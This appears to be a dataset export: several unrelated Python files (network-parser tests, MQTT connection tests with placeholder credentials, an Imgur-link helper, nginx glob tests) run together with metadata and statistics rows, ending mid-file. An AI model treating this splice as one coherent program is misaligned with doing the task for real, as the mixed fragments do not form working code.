sggjbb001 External 1 0
v6_sggjbb001 External 1 0
sjkGCS001-EC11 External 1 1
inet.0 : 682/684/684/0
inet.3 : 2/2/2/0
v6_sjkGCS001-EC11 External 1 1
inet6.0 : 0/0/0/0
obpGCS001-WC11 External 1 0
v6_obpGCS001-WC11 External 1 0
Groups: 14 Peers: 19 External: 6 Internal: 13 Down peers: 15 Flaps: 359
inet.0 : 682/1366/1366/0 External: 682/684/684/0 Internal: 0/682/682/0
inet.3 : 2/2/2/0 External: 2/2/2/0 Internal: 0/0/0/0
inet6.0 : 0/0/0/0 External: 0/0/0/0 Internal: 0/0/0/0
'''}
golden_parsed_output = {
"bgp-group-information": {
"bgp-group": [
{
"bgp-rib": [
{
"accepted-prefix-count": "682",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "682",
}
],
"established-count": "1",
"name": "hktGCS002",
"peer-count": "1",
"type": "Internal",
},
{
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
}
],
"established-count": "1",
"name": "v6_hktGCS002",
"peer-count": "1",
"type": "Internal",
},
{
"established-count": "0",
"name": "v4_RRC_72_TRIANGLE",
"peer-count": "3",
"type": "Internal",
},
{
"established-count": "0",
"name": "v6_RRC_72_TRIANGLE",
"peer-count": "2",
"type": "Internal",
},
{
"established-count": "0",
"name": "v6_RRC_72_SQUARE",
"peer-count": "2",
"type": "Internal",
},
{
"established-count": "0",
"name": "v4_RRC_72_SQUARE",
"peer-count": "2",
"type": "Internal",
},
{
"established-count": "0",
"name": "v4_Kentik",
"peer-count": "1",
"type": "Internal",
},
{
"established-count": "0",
"name": "v6_Kentik",
"peer-count": "1",
"type": "Internal",
},
{
"established-count": "0",
"name": "sggjbb001",
"peer-count": "1",
"type": "External",
},
{
"established-count": "0",
"name": "v6_sggjbb001",
"peer-count": "1",
"type": "External",
},
{
"bgp-rib": [
{
"accepted-prefix-count": "684",
"active-prefix-count": "682",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "684",
},
{
"accepted-prefix-count": "2",
"active-prefix-count": "2",
"advertised-prefix-count": "0",
"name": "inet.3",
"received-prefix-count": "2",
},
],
"established-count": "1",
"name": "sjkGCS001-EC11",
"peer-count": "1",
"type": "External",
},
{
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
}
],
"established-count": "1",
"name": "v6_sjkGCS001-EC11",
"peer-count": "1",
"type": "External",
},
{
"established-count": "0",
"name": "obpGCS001-WC11",
"peer-count": "1",
"type": "External",
},
{
"established-count": "0",
"name": "v6_obpGCS001-WC11",
"peer-count": "1",
"type": "External",
},
],
"bgp-information": {
"bgp-rib": [
{
"accepted-external-prefix-count": "684",
"accepted-internal-prefix-count": "682",
"accepted-prefix-count": "1366",
"active-external-prefix-count": "682",
"active-internal-prefix-count": "0",
"active-prefix-count": "682",
"name": "inet.0",
"received-prefix-count": "1366",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "684",
"total-internal-prefix-count": "682",
},
{
"accepted-external-prefix-count": "2",
"accepted-internal-prefix-count": "0",
"accepted-prefix-count": "2",
"active-external-prefix-count": "2",
"active-internal-prefix-count": "0",
"active-prefix-count": "2",
"name": "inet.3",
"received-prefix-count": "2",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "2",
"total-internal-prefix-count": "0",
},
{
"accepted-external-prefix-count": "0",
"accepted-internal-prefix-count": "0",
"accepted-prefix-count": "0",
"active-external-prefix-count": "0",
"active-internal-prefix-count": "0",
"active-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "0",
"total-internal-prefix-count": "0",
},
],
"down-peer-count": "15",
"external-peer-count": "6",
"flap-count": "359",
"group-count": "14",
"internal-peer-count": "13",
"peer-count": "19",
},
},
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowBgpGroupSummary(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowBgpGroupSummary(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
| 41.984859
| 112
| 0.391892
| 4,845
| 61,004
| 4.874923
| 0.04128
| 0.069393
| 0.048266
| 0.037936
| 0.953554
| 0.949151
| 0.932004
| 0.919345
| 0.901393
| 0.888183
| 0
| 0.083908
| 0.491673
| 61,004
| 1,452
| 113
| 42.013774
| 0.677749
| 0.003623
| 0
| 0.814038
| 0
| 0.003618
| 0.528777
| 0.096972
| 0
| 0
| 0
| 0
| 0.004342
| 1
| 0.004342
| false
| 0
| 0.004342
| 0
| 0.021708
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f7b6b49a78e0c420431267b8e0868e805d4e6f9
| 105
|
py
|
Python
|
daceml/transformation/__init__.py
|
manuelburger/daceml
|
501a05b0531bcf208b43816eeaba998feb83feb5
|
[
"BSD-3-Clause"
] | null | null | null |
daceml/transformation/__init__.py
|
manuelburger/daceml
|
501a05b0531bcf208b43816eeaba998feb83feb5
|
[
"BSD-3-Clause"
] | null | null | null |
daceml/transformation/__init__.py
|
manuelburger/daceml
|
501a05b0531bcf208b43816eeaba998feb83feb5
|
[
"BSD-3-Clause"
] | null | null | null |
from .constant_folding import ConstantFolding
from .parameter_to_transient import parameter_to_transient
| 35
| 58
| 0.904762
| 13
| 105
| 6.923077
| 0.615385
| 0.244444
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07619
| 105
| 2
| 59
| 52.5
| 0.927835
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3f81bbe6120825b64ad91b7ec7594077da504f4d
| 110
|
py
|
Python
|
nano/blocks.py
|
bbedward/nano-python
|
a996bf5af57ece64c8389fc0b54bafecf045c5f4
|
[
"MIT"
] | null | null | null |
nano/blocks.py
|
bbedward/nano-python
|
a996bf5af57ece64c8389fc0b54bafecf045c5f4
|
[
"MIT"
] | null | null | null |
nano/blocks.py
|
bbedward/nano-python
|
a996bf5af57ece64c8389fc0b54bafecf045c5f4
|
[
"MIT"
] | 1
|
2021-09-12T12:32:14.000Z
|
2021-09-12T12:32:14.000Z
|
#: Genesis block hash
GENESIS_BLOCK_HASH = '991CF190094C00F0B68E2E5F75F6BEE95A2E0BD93CEAA4A6734DB9F19B728948'
| 36.666667
| 87
| 0.890909
| 7
| 110
| 13.714286
| 0.571429
| 0.25
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.378641
| 0.063636
| 110
| 2
| 88
| 55
| 0.553398
| 0.181818
| 0
| 0
| 0
| 0
| 0.719101
| 0.719101
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3f8506783d2c1317b41cd456d09713df8b733c7d
| 114
|
py
|
Python
|
tests/__init__.py
|
tinker-coin/tinker-coin
|
3d599f642f4f49d30ba9bc58316a502e8a325e85
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
tinker-coin/tinker-coin
|
3d599f642f4f49d30ba9bc58316a502e8a325e85
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
tinker-coin/tinker-coin
|
3d599f642f4f49d30ba9bc58316a502e8a325e85
|
[
"MIT"
] | null | null | null |
import os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'node'))
| 38
| 98
| 0.745614
| 20
| 114
| 4.05
| 0.5
| 0.296296
| 0.320988
| 0.37037
| 0.395062
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04386
| 114
| 2
| 99
| 57
| 0.743119
| 0
| 0
| 0
| 0
| 0
| 0.035088
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3f9ec282ed4547f2862e2f1365aea29123eb3226
| 6,410
|
py
|
Python
|
tests/mqtt/test_components_mqtt_connection.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 12
|
2019-03-18T13:03:46.000Z
|
2019-08-14T03:13:32.000Z
|
tests/mqtt/test_components_mqtt_connection.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 4
|
2019-04-05T07:14:59.000Z
|
2019-12-06T23:51:31.000Z
|
tests/mqtt/test_components_mqtt_connection.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 4
|
2019-05-01T07:56:20.000Z
|
2019-11-17T13:54:59.000Z
|
"""Tests for the `snipskit.components.MQTTSnipsComponent` class."""
from snipskit.mqtt.components import MQTTSnipsComponent
from snipskit.config import SnipsConfig
class SimpleMQTTComponent(MQTTSnipsComponent):
"""A simple Snips component using MQTT directly to test."""
def initialize(self):
pass
def test_snips_component_mqtt_connection_default(fs, mocker):
"""Test whether a `MQTTSnipsComponent` object with the default MQTT
connection settings connects to the MQTT broker correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file, contents='[snips-common]\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTComponent, 'initialize')
component = SimpleMQTTComponent()
# Check configuration
assert component.snips.mqtt.broker_address == 'localhost:1883'
# Check MQTT connection
assert component.mqtt.username_pw_set.call_count == 0
assert component.mqtt.tls_set.call_count == 0
assert component.mqtt.loop_forever.call_count == 1
component.mqtt.connect.assert_called_once_with('localhost', 1883, 60, '')
# Check whether `initialize()` method is called.
assert component.initialize.call_count == 1
def test_snips_component_mqtt_with_snips_config(fs, mocker):
"""Test whether a `MQTTSnipsComponent` object with a `SnipsConfig` object
passed to `__init__` uses the connection settings from the specified file.
"""
config_file = 'snips.toml'
fs.create_file(config_file, contents='[snips-common]\n'
'mqtt = "mqtt.example.com:1883"\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTComponent, 'initialize')
snips_config = SnipsConfig(config_file)
component = SimpleMQTTComponent(snips_config)
# Check configuration
assert component.snips == snips_config
assert component.snips.mqtt.broker_address == 'mqtt.example.com:1883'
# Check MQTT connection
assert component.mqtt.username_pw_set.call_count == 0
assert component.mqtt.tls_set.call_count == 0
assert component.mqtt.loop_forever.call_count == 1
component.mqtt.connect.assert_called_once_with('mqtt.example.com', 1883,
60, '')
# Check whether `initialize()` method is called.
assert component.initialize.call_count == 1
def test_snips_component_mqtt_connection_with_authentication(fs, mocker):
"""Test whether a `MQTTSnipsComponent` object with MQTT authentication
connects to the MQTT broker correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file, contents='[snips-common]\n'
'mqtt = "mqtt.example.com:8883"\n'
'mqtt_username = "foobar"\n'
'mqtt_password = "secretpassword"\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTComponent, 'initialize')
component = SimpleMQTTComponent()
# Check configuration
assert component.snips.mqtt.broker_address == 'mqtt.example.com:8883'
assert component.snips.mqtt.auth.username == 'foobar'
assert component.snips.mqtt.auth.password == 'secretpassword'
# Check MQTT connection
component.mqtt.username_pw_set.assert_called_once_with('foobar',
'secretpassword')
assert component.mqtt.tls_set.call_count == 0
assert component.mqtt.loop_forever.call_count == 1
component.mqtt.connect.assert_called_once_with('mqtt.example.com', 8883,
60, '')
# Check whether `initialize()` method is called.
assert component.initialize.call_count == 1
def test_snips_component_mqtt_connection_with_tls_and_authentication(fs, mocker):
"""Test whether a `MQTTSnipsComponent` object with TLS and MQTT
authentication connects to the MQTT broker correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file,
contents='[snips-common]\n'
'mqtt = "mqtt.example.com:4883"\n'
'mqtt_username = "foobar"\n'
'mqtt_password = "secretpassword"\n'
'mqtt_tls_hostname="mqtt.example.com"\n'
'mqtt_tls_cafile="/etc/ssl/certs/ca-certificates.crt"\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTComponent, 'initialize')
component = SimpleMQTTComponent()
# Check configuration
assert component.snips.mqtt.broker_address == 'mqtt.example.com:4883'
assert component.snips.mqtt.auth.username == 'foobar'
assert component.snips.mqtt.auth.password == 'secretpassword'
assert component.snips.mqtt.tls.hostname == 'mqtt.example.com'
assert component.snips.mqtt.tls.ca_file == '/etc/ssl/certs/ca-certificates.crt'
# Check MQTT connection
component.mqtt.username_pw_set.assert_called_once_with('foobar',
'secretpassword')
component.mqtt.tls_set.assert_called_once_with(ca_certs='/etc/ssl/certs/ca-certificates.crt',
certfile=None,
keyfile=None)
assert component.mqtt.loop_forever.call_count == 1
component.mqtt.connect.assert_called_once_with('mqtt.example.com', 4883,
60, '')
# Check whether `initialize()` method is called.
assert component.initialize.call_count == 1
| 41.895425
| 97
| 0.663651
| 734
| 6,410
| 5.625341
| 0.125341
| 0.087188
| 0.058125
| 0.073626
| 0.85735
| 0.831194
| 0.788326
| 0.788326
| 0.765076
| 0.70017
| 0
| 0.01315
| 0.228861
| 6,410
| 152
| 98
| 42.171053
| 0.822173
| 0.15039
| 0
| 0.6
| 0
| 0
| 0.244598
| 0.157601
| 0
| 0
| 0
| 0
| 0.344444
| 1
| 0.055556
| false
| 0.077778
| 0.022222
| 0
| 0.088889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3fa6382fbfb25f246d7abe67f96cb8764bc4d846
| 4,964
|
py
|
Python
|
functions.py
|
daleshingles/TheDon
|
756fe1904e640e1e6b314eb652e2643dd1e59ec8
|
[
"MIT"
] | 3
|
2019-05-30T19:36:59.000Z
|
2020-10-10T16:22:05.000Z
|
functions.py
|
daleshingles/TheDon
|
756fe1904e640e1e6b314eb652e2643dd1e59ec8
|
[
"MIT"
] | 1
|
2019-06-05T18:54:50.000Z
|
2019-06-05T18:54:50.000Z
|
functions.py
|
daleshingles/TheDon
|
756fe1904e640e1e6b314eb652e2643dd1e59ec8
|
[
"MIT"
] | 1
|
2019-05-29T23:47:28.000Z
|
2019-05-29T23:47:28.000Z
|
from pytz import timezone
from datetime import date, datetime, time
from dateutil import tz, parser
import random
def to_time(utc_time):
ratime = timezone('America/Chicago')
localtime = utc_time.astimezone(ratime)
return localtime.strftime('%b %d %H:%M')
def from_time(ra_time):
#ratime = timezone('America/Chicago')
utctimezone = timezone('Etc/Greenwich')
utctime = ra_time.astimezone(utctimezone)
return utctime.strftime('%b %d %H:%M')
def my_parser(*args, default_tzinfo=tz.gettz("America/Chicago"), **kwargs):
dt = parser.parse(*args, **kwargs)
return dt.replace(tzinfo=dt.tzinfo or default_tzinfo)
def bart_image():
a = ['https://i.imgur.com/KG9qUYb.png','https://i.imgur.com/WxUtb6T.jpg','https://i.imgur.com/NhprtjJ.jpg','https://i.imgur.com/pXilsu7.jpg','https://i.imgur.com/dYiYiFm.jpg','https://i.imgur.com/uY4M6Mx.jpg','https://i.imgur.com/nuKoOZk.png','https://i.imgur.com/QF70JM8.jpg','https://i.imgur.com/PCmXj8t.jpg','https://i.imgur.com/xVBs8cX.jpg','https://i.imgur.com/FNbeATG.jpg','https://i.imgur.com/Z4ufOZH.jpg','https://i.imgur.com/N385AB7.jpg','https://i.imgur.com/ErvBDk9.jpg','https://i.imgur.com/jeEXih2.jpg','https://i.imgur.com/uc1bBt8.png','https://i.imgur.com/CDB5D4Q.png','https://i.imgur.com/fXkke9G.jpg','https://i.imgur.com/kjqo2gN.jpg','https://i.imgur.com/MAdxt28.jpg','https://i.imgur.com/7l0Ai4T.jpg','https://i.imgur.com/qX4x2aD.jpg','https://i.imgur.com/elzhjLZ.jpg','https://i.imgur.com/vy7GtkY.png','https://i.imgur.com/dWwG2Uk.png','https://i.imgur.com/550oh1c.jpg','https://i.imgur.com/i4TEYNr.jpg','https://i.imgur.com/xijNZRu.jpg','https://i.imgur.com/Y9vOacY.jpg','https://i.imgur.com/yAFC7y6.png','https://i.imgur.com/1MAw2SD.png','https://i.imgur.com/9cMaTmS.jpg','https://i.imgur.com/GwqLVE7.jpg','https://i.imgur.com/ql3td93.jpg','https://i.imgur.com/hy1HLhj.jpg','https://i.imgur.com/VZMxKMk.jpg','https://i.imgur.com/dR1oFsw.jpg','https://i.imgur.com/Z9sz3oJ.jpg','https://i.imgur.com/8oqNp8h.jpg','https://i.imgur.com/GSrSjKj.jpg','https://i.imgur.com/frz0Av5.jpg','https://i.imgur.com/Ctk2owR.jpg','https://i.imgur.com/1Zld9zy.jpg','https://i.imgur.com/rogLdLS.jpg','https://i.imgur.com/cSL9Awz.jpg','https://i.imgur.com/MDO2UwT.jpg','https://i.imgur.com/b42QDdi.jpg','https://i.imgur.com/hCkiHme.png','https://i.imgur.com/P6jrhO6.png','https://i.imgur.com/oHVLwQG.png','https://i.imgur.com/ExY0mb9.png','https://i.imgur.com/Odb8VTK.png','https://i.imgur.com/2nLE8Aa.png','https://i.imgur.com/zlu2371.png','https://i.imgur.com/eH6avqy.png','https://i.imgur.com/vKJ5Jif.png','https://i.imgur.com/g5Le5rK.png','https://i.imgur.com/TKCaAzR.png','https://i.imgur.com/qW
cvWLQ.png','https://i.imgur.com/xq8w053.png','https://i.imgur.com/vClvm18.png','https://i.imgur.com/DQAziIi.png','https://i.imgur.com/1RXNvS7.png','https://i.imgur.com/ib1e3f3.png','https://i.imgur.com/DG0tJVx.jpg','https://i.imgur.com/ovTSOfX.jpg','https://i.imgur.com/YzSH3rI.png','https://i.imgur.com/lpr9nbT.jpg','https://i.imgur.com/BUp4xNj.jpg','https://i.imgur.com/QVNAiz5.jpg','https://i.imgur.com/zee3vTs.jpg','https://i.imgur.com/Z6jQq4G.jpg','https://i.imgur.com/yVI6beX.jpg','https://i.imgur.com/cmLarXA.jpg','https://i.imgur.com/U9F7j9f.jpg','https://i.imgur.com/2bjkZe0.jpg','https://i.imgur.com/21fGrWZ.jpg','https://i.imgur.com/jlSWrSl.jpg','https://i.imgur.com/GMfVRic.jpg','https://i.imgur.com/zraoFoD.jpg','https://i.imgur.com/0cuwASi.jpg','https://i.imgur.com/0HUsG7K.jpg','https://i.imgur.com/DrRZ87g.jpg','https://i.imgur.com/jP2LbJl.jpg','https://i.imgur.com/RGqjy9b.jpg','https://i.imgur.com/6918pkd.jpg','https://i.imgur.com/TeaU24j.jpg','https://i.imgur.com/G2vg77A.jpg','https://i.imgur.com/Kzze4Lf.jpg','https://i.imgur.com/UgVeCrN.jpg','https://i.imgur.com/TvsEdkG.jpg','https://i.imgur.com/05QmS3w.jpg','https://i.imgur.com/HgxVnyT.jpg','https://i.imgur.com/JjgFOKk.jpg','https://i.imgur.com/EPKSrod.jpg','https://i.imgur.com/7ehcrt6.jpg','https://i.imgur.com/1U6GHUW.jpg','https://i.imgur.com/MKATl6d.jpg','https://i.imgur.com/q9RlBek.jpg','https://i.imgur.com/fTviVXd.jpg','https://i.imgur.com/2csk6ni.jpg','https://i.imgur.com/LOmYAFe.jpg','https://i.imgur.com/G0JRlcM.jpg','https://i.imgur.com/UuotaSZ.jpg','https://i.imgur.com/5xyw7dm.jpg','https://i.imgur.com/KOXUDbH.jpg']
random.shuffle(a)
return a[0]
def random_team():
a = ["Atlanta Braves","Miami Marlins","New York Mets","Philadelphia Phillies","Washington Nationals","Chicago Cubs","Cincinnati Reds","Milwaukee Brewers","Pittsburgh Pirates","St.Louis Cardinals","Arizona Diamondbacks","Colorado Rockies","Los Angeles Dodgers","San Diego Padres","San Francisco Giants","Baltimore Orioles","Boston Red Sox","New York Yankees","Tampa Bay Rays","Toronto Blue Jays","Chicago White Sox","Cleveland Indians","Detroit Tigers","Kansas City Royals","Minnesota Twins","Houston Astros","Los Angeles Angels","Oakland Athletics","Seattle Mariners","Texas Rangers"]
return a[hash(str(date)) % len(a)]
| 155.125
| 3,613
| 0.710516
| 817
| 4,964
| 4.30355
| 0.275398
| 0.180887
| 0.331627
| 0.422071
| 0.534414
| 0.008532
| 0
| 0
| 0
| 0
| 0
| 0.028416
| 0.035858
| 4,964
| 31
| 3,614
| 160.129032
| 0.706226
| 0.007252
| 0
| 0
| 0
| 0
| 0.779379
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.227273
| false
| 0
| 0.181818
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3fbd51088d4d5c63c30c64e0ce56608253c047ba
| 91
|
py
|
Python
|
tests/resources/test_cases/union_fun.py
|
dertilo/coding
|
9b827f2b02900f1d8e080fbde4cdb08a365572e7
|
[
"MIT"
] | null | null | null |
tests/resources/test_cases/union_fun.py
|
dertilo/coding
|
9b827f2b02900f1d8e080fbde4cdb08a365572e7
|
[
"MIT"
] | null | null | null |
tests/resources/test_cases/union_fun.py
|
dertilo/coding
|
9b827f2b02900f1d8e080fbde4cdb08a365572e7
|
[
"MIT"
] | null | null | null |
def union_fun(x):
return x
def main():
s = union_fun("foo")
s = union_fun(1)
| 11.375
| 24
| 0.56044
| 16
| 91
| 3
| 0.5625
| 0.5
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015385
| 0.285714
| 91
| 7
| 25
| 13
| 0.723077
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3fd3a7eeb9e8f16e46b3a60f2eaaa26a210f8981
| 59
|
py
|
Python
|
web_website/tests/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | null | null | null |
web_website/tests/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | 1
|
2020-05-03T04:27:29.000Z
|
2020-05-03T04:27:29.000Z
|
web_website/tests/__init__.py
|
eneldoserrata/misc-addons
|
6f3b94d8a71d603d9ad449f96edfc66385e78080
|
[
"MIT"
] | 2
|
2020-05-09T02:08:59.000Z
|
2022-03-21T06:37:15.000Z
|
from . import test_website_dependent
from . import test_ui
| 19.666667
| 36
| 0.830508
| 9
| 59
| 5.111111
| 0.666667
| 0.434783
| 0.608696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 59
| 2
| 37
| 29.5
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3fd7dd43357f26fb6978a0868c30ecee48376692
| 5,664
|
py
|
Python
|
test/unit/agent/common/util/glib.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 308
|
2015-11-17T13:15:33.000Z
|
2022-03-24T12:03:40.000Z
|
test/unit/agent/common/util/glib.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 211
|
2015-11-16T15:27:41.000Z
|
2022-03-28T16:20:15.000Z
|
test/unit/agent/common/util/glib.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 80
|
2015-11-16T18:20:30.000Z
|
2022-03-02T12:47:56.000Z
|
# -*- coding: utf-8 -*-
from hamcrest import *
from test.base import BaseTestCase
import amplify.agent.common.util.glib as glib
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "grant.hulegaard@nginx.com"
class GlibTestCase(BaseTestCase):
def test_overall(self):
excludes = [
'access-frontend-*.log',
'receiver1-*.log',
'frontend2.log',
'/var/log/nginx/frontend/*',
'/var/log/naas/'
]
file_paths = [
'/var/log/nginx/frontend/asdf.log', # exclude 4
'/var/log/nginx/frontend/frontend3.log', # exclude 4
'/var/log/blank.log',
'/var/log/frontend2.log', # exclude 3
'/var/receiver1-2012.log', # exclude 2
'/var/log/naas/blah.log', # exclude 5
'access-frontend-asf.log' # exclude 1
]
results = file_paths
for exclude_pathname in excludes:
for match in glib.glib(file_paths, exclude_pathname):
results.remove(match)
assert_that(results, has_length(1))
assert_that(results[0], equal_to('/var/log/blank.log'))
def test_more(self):
pattern = '/etc/nginx/*.conf'
file_paths = [
'/etc/nginx/nginx.conf',
'/etc/nginx/bir/aaa/subdir/host.conf',
'/etc/nginx/conf.d/blockips.conf',
'/etc/nginx/conf.d/default.conf',
'/etc/nginx/conf.d/default.conf.bak',
'/etc/nginx/conf.d/host.conf',
'/etc/nginx/conf.d/proxy.conf',
'/etc/nginx/conf.d/ssl.conf',
'/etc/nginx/conf.d/servers/bamboo_server.conf',
'/etc/nginx/conf.d/servers/dev1_server.conf',
'/etc/nginx/conf.d/servers/dev1db00_server.conf',
'/etc/nginx/conf.d/servers/docker_build_server.conf',
'/etc/nginx/conf.d/servers/docker_registry_server.conf',
'/etc/nginx/conf.d/servers/eurotax_proxy.conf',
'/etc/nginx/conf.d/servers/int01_server.conf',
'/etc/nginx/conf.d/servers/int01db00_server.conf',
'/etc/nginx/conf.d/servers/nexus_server.conf',
'/etc/nginx/conf.d/servers/soft2run_server.conf',
'/etc/nginx/conf.d/servers/spearhead_server.conf',
'/etc/nginx/conf.d/servers/toolsdb_server.conf',
'/etc/nginx/conf.d/servers/webcache_server.conf.bak',
'/etc/nginx/conf.d/servers/webcache_server_working.conf',
'/etc/nginx/conf.d/tcp_streams/iboxdb_server.conf',
'/etc/nginx/ssl/soft2run_ssl_cert.conf',
'/etc/nginx/ssl/sph_ssl_cert.conf'
]
results = glib.glib(file_paths, pattern)
assert_that(results, has_length(1))
assert_that(results[0], equal_to('/etc/nginx/nginx.conf'))
def test_more_directories(self):
pattern = '/etc/nginx/conf.d/*/*.conf'
file_paths = [
'/etc/nginx/nginx.conf',
'/etc/nginx/bir/aaa/subdir/host.conf',
'/etc/nginx/conf.d/blockips.conf',
'/etc/nginx/conf.d/default.conf',
'/etc/nginx/conf.d/default.conf.bak',
